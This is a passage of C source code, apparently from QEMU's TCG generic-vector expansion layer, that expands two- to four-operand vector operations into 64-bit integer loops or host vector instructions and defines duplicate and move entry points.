= 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (scalar_first) { fni(tcg_ctx, t1, c, t0); } else { fni(tcg_ctx, t1, t0, c); } tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* Expand OPSZ bytes worth of three-operand operations using i64 elements. 
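Each iteration loads one 64-bit lane from aofs and bofs, applies fni, and stores the result lane to dofs; load_dest additionally pre-loads the old destination lane for read-modify-write callbacks.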
 */
static void expand_3_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                         uint32_t bofs, uint32_t oprsz, bool load_dest,
                         void (*fni)(TCGContext *, TCGv_i64, TCGv_i64,
                                     TCGv_i64))
{
    TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx);
    uint32_t i;

    for (i = 0; i < oprsz; i += 8) {
        tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i);
        tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i);
        if (load_dest) {
            tcg_gen_ld_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i);
        }
        fni(tcg_ctx, t2, t0, t1);
        tcg_gen_st_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i);
    }
    tcg_temp_free_i64(tcg_ctx, t2);
    tcg_temp_free_i64(tcg_ctx, t1);
    tcg_temp_free_i64(tcg_ctx, t0);
}

static void expand_3i_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                          uint32_t bofs, uint32_t oprsz, int64_t c,
                          bool load_dest,
                          void (*fni)(TCGContext *, TCGv_i64, TCGv_i64,
                                      TCGv_i64, int64_t))
{
    TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx);
    uint32_t i;

    for (i = 0; i < oprsz; i += 8) {
        tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i);
        tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i);
        if (load_dest) {
            tcg_gen_ld_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i);
        }
        fni(tcg_ctx, t2, t0, t1, c);
        tcg_gen_st_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i);
    }
    tcg_temp_free_i64(tcg_ctx, t0);
    tcg_temp_free_i64(tcg_ctx, t1);
    tcg_temp_free_i64(tcg_ctx, t2);
}

/* Expand OPSZ bytes worth of four-operand operations using i64 elements.  */
static void expand_4_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                         uint32_t bofs, uint32_t cofs, uint32_t oprsz,
                         bool write_aofs,
                         void (*fni)(TCGContext *, TCGv_i64, TCGv_i64,
                                     TCGv_i64, TCGv_i64))
{
    TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx);
    TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx);
    uint32_t i;

    for (i = 0; i < oprsz; i += 8) {
        tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i);
        tcg_gen_ld_i64(tcg_ctx, t2, tcg_ctx->cpu_env, bofs + i);
        tcg_gen_ld_i64(tcg_ctx, t3, tcg_ctx->cpu_env, cofs + i);
        fni(tcg_ctx, t0, t1, t2, t3);
        tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i);
        if (write_aofs) {
            tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i);
        }
    }
    tcg_temp_free_i64(tcg_ctx, t3);
    tcg_temp_free_i64(tcg_ctx, t2);
    tcg_temp_free_i64(tcg_ctx, t1);
    tcg_temp_free_i64(tcg_ctx, t0);
}

/* Expand OPSZ bytes worth of two-operand operations using host vectors.  */
static void expand_2_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs,
                         uint32_t aofs, uint32_t oprsz, uint32_t tysz,
                         TCGType type,
                         void (*fni)(TCGContext *, unsigned, TCGv_vec,
                                     TCGv_vec))
{
    TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type);
    uint32_t i;

    for (i = 0; i < oprsz; i += tysz) {
        tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i);
        fni(tcg_ctx, vece, t0, t0);
        tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i);
    }
    tcg_temp_free_vec(tcg_ctx, t0);
}

/* Expand OPSZ bytes worth of two-vector operands and an immediate operand
   using host vectors.
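   tysz is the step in bytes and must match type: 8 for TCG_TYPE_V64,
   16 for TCG_TYPE_V128, 32 for TCG_TYPE_V256.  An illustrative round of
   expand_2i_vec with load_dest == false:

       t0 = ld_vec(env, aofs + i);
       fni(vece, t1, t0, c);
       st_vec(t1, env, dofs + i);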
*/ static void expand_2i_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t tysz, TCGType type, int64_t c, bool load_dest, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, int64_t)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (load_dest) { tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, vece, t1, t0, c); tcg_gen_st_vec(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); tcg_temp_free_vec(tcg_ctx, t1); } static void expand_2s_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t tysz, TCGType type, TCGv_vec c, bool scalar_first, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (scalar_first) { fni(tcg_ctx, vece, t1, c, t0); } else { fni(tcg_ctx, vece, t1, t0, c); } tcg_gen_st_vec(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); tcg_temp_free_vec(tcg_ctx, t1); } /* Expand OPSZ bytes worth of three-operand operations using host vectors. */ static void expand_3_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t tysz, TCGType type, bool load_dest, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, vece, t2, t0, t1); tcg_gen_st_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t2); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t0); } /* * Expand OPSZ bytes worth of three-vector operands and an immediate operand * using host vectors. */ static void expand_3i_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t tysz, TCGType type, int64_t c, bool load_dest, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, int64_t)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, vece, t2, t0, t1, c); tcg_gen_st_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); } /* Expand OPSZ bytes worth of four-operand operations using host vectors. 
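   write_aofs additionally stores t1 back to aofs each round, for
   operations that update their first input in place as well as
   producing a result in dofs.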
*/ static void expand_4_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t tysz, TCGType type, bool write_aofs, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t3 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t2, tcg_ctx->cpu_env, bofs + i); tcg_gen_ld_vec(tcg_ctx, t3, tcg_ctx->cpu_env, cofs + i); fni(tcg_ctx, vece, t0, t1, t2, t3); tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); if (write_aofs) { tcg_gen_st_vec(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); } } tcg_temp_free_vec(tcg_ctx, t3); tcg_temp_free_vec(tcg_ctx, t2); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t0); } /* Expand a vector two-operand operation. */ void tcg_gen_gvec_2(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, const GVecGen2 *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2_vec(tcg_ctx, g->vece, dofs, aofs, some, 32, TCG_TYPE_V256, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, g->fniv); break; case TCG_TYPE_V64: expand_2_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_2_i64(tcg_ctx, dofs, aofs, oprsz, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_2_i32(tcg_ctx, dofs, aofs, oprsz, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_2_ool(tcg_ctx, dofs, aofs, oprsz, maxsz, g->data, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector operation with two vectors and an immediate. */ void tcg_gen_gvec_2i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen2i *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. 
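   Worked example: oprsz == 80 gives some = QEMU_ALIGN_DOWN(80, 32) = 64,
   so two V256 rounds are emitted here, and the remaining 16 bytes fall
   through to the TCG_TYPE_V128 case below.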
*/ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2i_vec(tcg_ctx, g->vece, dofs, aofs, some, 32, TCG_TYPE_V256, c, g->load_dest, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2i_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, c, g->load_dest, g->fniv); break; case TCG_TYPE_V64: expand_2i_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, c, g->load_dest, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_2i_i64(tcg_ctx, dofs, aofs, oprsz, c, g->load_dest, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_2i_i32(tcg_ctx, dofs, aofs, oprsz, c, g->load_dest, g->fni4); } else { if (g->fno) { tcg_gen_gvec_2_ool(tcg_ctx, dofs, aofs, oprsz, maxsz, c, g->fno); } else { TCGv_i64 tcg_c = tcg_const_i64(tcg_ctx, c); tcg_gen_gvec_2i_ool(tcg_ctx, dofs, aofs, tcg_c, oprsz, maxsz, c, g->fnoi); tcg_temp_free_i64(tcg_ctx, tcg_c); } oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector operation with two vectors and a scalar. */ void tcg_gen_gvec_2s(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, TCGv_i64 c, const GVecGen2s *g) { TCGType type; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } if (type != 0) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGv_vec t_vec = tcg_temp_new_vec(tcg_ctx, type); uint32_t some; tcg_gen_dup_i64_vec(tcg_ctx, g->vece, t_vec, c); switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2s_vec(tcg_ctx, g->vece, dofs, aofs, some, 32, TCG_TYPE_V256, t_vec, g->scalar_first, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2s_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, t_vec, g->scalar_first, g->fniv); break; case TCG_TYPE_V64: expand_2s_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, t_vec, g->scalar_first, g->fniv); break; default: g_assert_not_reached(); } tcg_temp_free_vec(tcg_ctx, t_vec); tcg_swap_vecop_list(hold_list); } else if (g->fni8 && check_size_impl(oprsz, 8)) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, g->vece, t64, c); expand_2s_i64(tcg_ctx, dofs, aofs, oprsz, t64, g->scalar_first, g->fni8); tcg_temp_free_i64(tcg_ctx, t64); } else if (g->fni4 && check_size_impl(oprsz, 4)) { TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t32, c); gen_dup_i32(tcg_ctx, g->vece, t32, t32); expand_2s_i32(tcg_ctx, dofs, aofs, oprsz, t32, g->scalar_first, g->fni4); tcg_temp_free_i32(tcg_ctx, t32); } else { tcg_gen_gvec_2i_ool(tcg_ctx, dofs, aofs, c, oprsz, maxsz, 0, g->fno); return; } if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector three-operand operation. */ void tcg_gen_gvec_3(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, const GVecGen3 *g) { const TCGOpcode *this_list = g->opt_opc ? 
g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs); check_overlap_3(dofs, aofs, bofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_3_vec(tcg_ctx, g->vece, dofs, aofs, bofs, some, 32, TCG_TYPE_V256, g->load_dest, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_3_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 16, TCG_TYPE_V128, g->load_dest, g->fniv); break; case TCG_TYPE_V64: expand_3_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 8, TCG_TYPE_V64, g->load_dest, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_3_i64(tcg_ctx, dofs, aofs, bofs, oprsz, g->load_dest, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_3_i32(tcg_ctx, dofs, aofs, bofs, oprsz, g->load_dest, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_3_ool(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, g->data, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector operation with three vectors and an immediate. */ void tcg_gen_gvec_3i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen3i *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs); check_overlap_3(dofs, aofs, bofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* * Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_3i_vec(tcg_ctx, g->vece, dofs, aofs, bofs, some, 32, TCG_TYPE_V256, c, g->load_dest, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_3i_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 16, TCG_TYPE_V128, c, g->load_dest, g->fniv); break; case TCG_TYPE_V64: expand_3i_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 8, TCG_TYPE_V64, c, g->load_dest, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_3i_i64(tcg_ctx, dofs, aofs, bofs, oprsz, c, g->load_dest, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_3i_i32(tcg_ctx, dofs, aofs, bofs, oprsz, c, g->load_dest, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_3_ool(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, c, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector four-operand operation. 
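   A front end drives this by filling in a GVecGen4 and calling
   tcg_gen_gvec_4; an illustrative (hypothetical) descriptor:

       static const GVecGen4 g = {
           .fni8 = gen_foo_i64,      // 64-bit integral fallback
           .fniv = gen_foo_vec,      // host-vector expansion
           .fno  = gen_helper_foo,   // out-of-line helper
           .vece = MO_64,
       };
       tcg_gen_gvec_4(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, maxsz, &g);

   The gen_foo_* names above are placeholders, not functions in this file.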
*/ void tcg_gen_gvec_4(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, const GVecGen4 *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs | cofs); check_overlap_4(dofs, aofs, bofs, cofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_4_vec(tcg_ctx, g->vece, dofs, aofs, bofs, cofs, some, 32, TCG_TYPE_V256, g->write_aofs, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; cofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_4_vec(tcg_ctx, g->vece, dofs, aofs, bofs, cofs, oprsz, 16, TCG_TYPE_V128, g->write_aofs, g->fniv); break; case TCG_TYPE_V64: expand_4_vec(tcg_ctx, g->vece, dofs, aofs, bofs, cofs, oprsz, 8, TCG_TYPE_V64, g->write_aofs, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_4_i64(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, g->write_aofs, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_4_i32(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, g->write_aofs, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_4_ool(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, maxsz, g->data, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* * Expand specific vector operations. 
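   These are the public entry points used by target front ends, e.g.

       tcg_gen_gvec_mov(tcg_ctx, MO_8, dofs, aofs, 16, 16);

   copies a 16-byte vector; each entry point picks the best expansion
   (host vector, i64/i32 loop, or out-of-line helper) automatically.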
*/ static void vec_mov2(TCGContext *tcg_ctx, unsigned vece, TCGv_vec a, TCGv_vec b) { tcg_gen_mov_vec(tcg_ctx, a, b); } void tcg_gen_gvec_mov(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2 g = { .fni8 = tcg_gen_mov_i64, .fniv = vec_mov2, .fno = gen_helper_gvec_mov, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (dofs != aofs) { tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g); } else { check_size_align(oprsz, maxsz, dofs); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } } void tcg_gen_gvec_dup_i32(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_i32 in) { check_size_align(oprsz, maxsz, dofs); tcg_debug_assert(vece <= MO_32); do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, in, NULL, 0); } void tcg_gen_gvec_dup_i64(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_i64 in) { check_size_align(oprsz, maxsz, dofs); tcg_debug_assert(vece <= MO_64); do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, NULL, in, 0); } void tcg_gen_gvec_dup_mem(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { check_size_align(oprsz, maxsz, dofs); if (vece <= MO_64) { TCGType type = choose_vector_type(tcg_ctx, NULL, vece, oprsz, 0); if (type != 0) { TCGv_vec t_vec = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dup_mem_vec(tcg_ctx, vece, t_vec, tcg_ctx->cpu_env, aofs); do_dup_store(tcg_ctx, type, dofs, oprsz, maxsz, t_vec); tcg_temp_free_vec(tcg_ctx, t_vec); } else if (vece <= MO_32) { TCGv_i32 in = tcg_temp_new_i32(tcg_ctx); switch (vece) { case MO_8: tcg_gen_ld8u_i32(tcg_ctx, in, tcg_ctx->cpu_env, aofs); break; case MO_16: tcg_gen_ld16u_i32(tcg_ctx, in, tcg_ctx->cpu_env, aofs); break; default: tcg_gen_ld_i32(tcg_ctx, in, tcg_ctx->cpu_env, aofs); break; } do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, in, NULL, 0); tcg_temp_free_i32(tcg_ctx, in); } else { TCGv_i64 in = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, in, tcg_ctx->cpu_env, aofs); do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, NULL, in, 0); tcg_temp_free_i64(tcg_ctx, in); } } else { /* 128-bit duplicate. */ /* ??? Dup to 256-bit vector. 
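   The 128-bit case below uses a single V128 load plus a store loop when
   the backend has host vector support, and otherwise falls back to two
   i64 loads replicated across the destination in 16-byte steps.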
*/ int i; tcg_debug_assert(vece == 4); tcg_debug_assert(oprsz >= 16); if (TCG_TARGET_HAS_v128) { TCGv_vec in = tcg_temp_new_vec(tcg_ctx, TCG_TYPE_V128); tcg_gen_ld_vec(tcg_ctx, in, tcg_ctx->cpu_env, aofs); for (i = 0; i < oprsz; i += 16) { tcg_gen_st_vec(tcg_ctx, in, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, in); } else { TCGv_i64 in0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, in0, tcg_ctx->cpu_env, aofs); tcg_gen_ld_i64(tcg_ctx, in1, tcg_ctx->cpu_env, aofs + 8); for (i = 0; i < oprsz; i += 16) { tcg_gen_st_i64(tcg_ctx, in0, tcg_ctx->cpu_env, dofs + i); tcg_gen_st_i64(tcg_ctx, in1, tcg_ctx->cpu_env, dofs + i + 8); } tcg_temp_free_i64(tcg_ctx, in0); tcg_temp_free_i64(tcg_ctx, in1); } if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } } void tcg_gen_gvec_dup64i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint64_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_64, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_dup32i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint32_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_32, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_dup16i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint16_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_16, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_dup8i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint8_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_8, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_not(TCGContext *tcg_ctx, unsigned vece, uint32_t 